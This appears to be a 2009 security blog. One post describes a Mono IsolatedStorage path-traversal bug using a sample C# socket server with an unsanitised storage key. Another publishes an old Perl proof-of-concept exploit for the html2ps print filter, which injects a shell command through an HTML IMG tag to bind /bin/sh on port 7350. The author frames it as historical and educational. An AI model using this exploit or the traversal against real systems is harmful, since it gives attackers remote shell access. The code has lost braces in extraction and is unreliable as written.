Tuesday, March 24, 2009

sharpen your .NET skills

I have had dozens of discussions about C#; being a secure
language and that CLR/VM based languages should be used
with new projects in order to increase security. One argument
is that memory corruption can't happen any longer.
I agree, but always point out that C# code is not secure
automagically, even if the programmers code is correct.
The runtime might be buggy as well! I recently read an
article in the famous german iX magazine about security measurements
in .NET. One of the measures is the so called IsolatedStorage
which allows you to store data in a secure way. Much like
a database, based on a token you can store/retrieve data
without your real filesystem being at risk. Nice thing,
and I coded an example-server:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.IO;
using System.IO.IsolatedStorage;

class Server {

private static void store(string key, Byte[] b)
try {
Console.WriteLine("Isolated storage @ {0}", key);
IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Create);
fs.Write(b, 0, b.Length);
} catch {

private static Byte[] load(string key)
Byte[] b = new Byte[256];
try {
Console.WriteLine("IsolatedStorage load @ {0}", key);
IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Open);
fs.Read(b, 0, b.Length);
} catch {
return b;
public static void Main()
Byte[] buf = new Byte[256];
int cnt;

string data = "";

ASCIIEncoding ascii = new ASCIIEncoding();
TcpListener l = new TcpListener(8080);
try {
Socket s = l.AcceptSocket();
while (data.Trim() != "quit") {
Array.Clear(buf, 0, buf.Length);
if ((cnt = s.Receive(buf, buf.Length, 0)) == 0)
data = ascii.GetString(buf, 0, cnt);
Console.WriteLine("Received: {0}", data.Trim());
if (data.StartsWith("store ")) {
Array.Clear(buf, 0, buf.Length);
if (s.Receive(buf, buf.Length, 0) == 0)
store(data.Substring(6, data.Length - 6).Trim(), buf);
} else if (data.StartsWith("load ")) {
Byte[] result = load(data.Substring(5, data.Length - 5).Trim());
} catch {

You can connect to the server on TCP port 8080 and
store/load data via the telnet interface for example.
Beside the easy of code and the fact that it treats
TCP streams like messages which could make trouble in
real networking environments, this code should be correct.
It fits perfectly as a localhost example. There is just
a problem with the IsolatedStorage itself!
Some versions of the mono runtime do not remove
"../" character sequences from the path component as it
should. So, depending on your configuration you can
obtain funny results. On a openSUSE 11.1, the storage
place is in ~/.config/.isolated-storage/[some-hash]/.
An attacking scenario is inside the xterm.
I already informed the maintainers and a fix is underway.
Its not a big issue, and I dont have any application in mind
that is actually vulnerable and uses IsolatedStorage this way.

File-system/storage tricks will be a major playground for
.NET/C# applications in future. In a non-public review
of a larger C# based "system" it turned out that it was possible to obtain
local root privileges by loading evil assemblies as
a result of tricking the application.
Additionally, the managed runtime may provide
(depending on the implementation) all the
nasty things that we got rid of in native CPUs during
the last years: executable data, fixed addresses etc.

Friday, March 20, 2009

PcapSharp updated

You can find a new pcap# version of my mono pcap binding
on my website. Its better tested than the old version,
and supports packet dumping and offline capturing of packets
now as well as it supported online capturing in the past.
It is possible to read/analyze the
pcap# dump-files with
tcpdump and wireshark. I am not an expert for Marshalling
C# types to plain C types, but I think I got it right :-)

Tuesday, March 10, 2009

Some news

This post satisfies two needs (except publishing code at all):

First, I hate how this blog automatically wraps my lines and
how it de-formats all things I am doing. I try to submit
pure HTML code now and hope it works. Second, I decided to
publish some old exploits of me for historical, technical
and educational purposes. A recent law-case in Germany showed
that jail-or-not is all about your intention. It is legal
to publish dual-use code or code that could be used to do
something evil if your intention is to make the world a more
secure place or to teach others how to protect themself etc..
It is illegal to publish such code in order to commit a crime
which is clearly and obviosuly not what I am doing.

The code is that old (2002), that there should rarely be any box at all
which still ships the vulnerable print-filter that is exploited
here. So, except for teaching something this code is useless.
The interesting thing about this piece is that the printfilter didnt
accept spaces in the IMG-tag. But read yourself:

#!/usr/bin/perl -W

# html2ps remote "lp" exploit. Opens shell on port 7350.
# If used for testing remote machines, /etc/printcap must
# contain appropriate remote printernames etc. and lpd must
# be set up correctly.
# (C) 2002 Sebastian Krahmer, proof of concept exploit.

# Brief problem description: lprng calls printfilters as any
# other print-spooling systems do. It calls them with UID of lp
# thats why you get lp-user shell later. The html2ps filter which is
# a perl script is called to convert the evil.html to .ps.
# However there it breaks because html2ps calls open() function insecurely
# and some other bad stuff is done too. It tries to convert the IMG embedded
# in the html and invokes some commands which give us access. Thats all. :)

sub usage
print "\n$0 <printhost> <remote-host>\n".
"\tprinthost -- name of printer in /etc/printcap\n".
"\tremote-host -- IP or hostname of host where shell appears\n".
"'$0 lp' is recommended for everyones own machine\n\n";

my $printhost = shift || usage();
my $remote = shift || usage();

print "Constructing evil.html ...\n";

open O, ">evil.html" or die $!;
print O<<__eof__;
<IMG SRC="|IFS=A;X=A;echo\${X}7350\${X}stream\${X}tcp\${X}nowait\${X}lp\${X}/bin/sh\${X}-i|dd\${X}of=/tmp/f;inetd\${X}/tmp/f">

close O;

if (fork() == 0) {
exec("/usr/bin/lpr", "-P", $printhost, "evil.html");
sleep 3;
print "Connecting ...\n";
exec("/usr/bin/telnet", $remote, 7350);